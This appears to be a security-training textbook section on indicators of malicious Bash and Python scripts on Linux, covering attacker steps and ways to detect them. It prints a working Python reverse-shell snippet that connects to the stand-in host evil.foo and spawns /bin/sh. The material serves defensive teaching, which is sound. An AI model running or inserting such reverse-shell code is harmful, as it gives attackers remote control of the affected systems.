# BASH AND PYTHON MALICIOUS INDICATORS

#### BASH AND PYTHON MALICIOUS INDICATORS

Most of the web runs on Linux, and Linux has proven remarkably resilient to attacks (meaning that it is able to withstand or recover quickly from difficult situations), given the high-value of the assets that depend on it. Most exploits of Linux systems depend on weak configuration, and/or vulnerabilities in web applications. In Linux, the command line is usually **Bourne Again Shell (Bash)**. Many Linux systems have Python enabled as well. Python scripts or batch files of bash commands can be used for automation tasks, such as backup, or for malicious purposes.

A malicious script running on a Linux host might attempt the following:

  
2.  Use commands such as `whoami` and `ifconfig/ip/route` to establish the local context.
  
4.  Download tools, possibly using `wget` or `curl`.
  
6.  Add `crontab` entries to enable persistence.
  
8.  Add a user to `sudo` and enable remote access via SSH.
  
10.  Change firewall rules using `iptables`.
  
12.  Use tools such as Nmap to scan for other hosts.
  

A very common vector for attacking Linux hosts is to use an exploit to install a web shell as a backdoor (acunetix.com/blog/articles/introduction-web-shells-part-1). Typical code to implement a **reverse shell** (connecting out to the machine at evil.foo on port 4444) is as follows:

```Python
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("evil.foo",4444))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

pty.spawn("/bin/sh")'
``` 

The `os.dup2` statements redirect the terminal's data streams stdin (0), stdout (1), and stderr (2) to the socket object (s). The `pty` module provides a library of functions for managing a pseudo-terminal, in this case starting the shell process at `/bin/sh`.

The code to implement a shell can be obfuscated in numerous ways. One way to identify malicious scripts trying to match code samples is to scan the file system against a configuration baseline, either using file integrity monitoring or use of the Linux diff command.

A common exploit for a vulnerable web server is to upload a cryptominer, misusing the server's CPU resources to try to obtain new cryptocurrency. You can use Linux utilities such as top and free to diagnose excessive CPU and memory resource consumption by such malware.

> _This F5 white paper describes the use of Bash and Python attack tools (f5.com/labs/articles/threat-intelligence/attackers-use-new--sophisticated-ways-to-install-cryptominers)._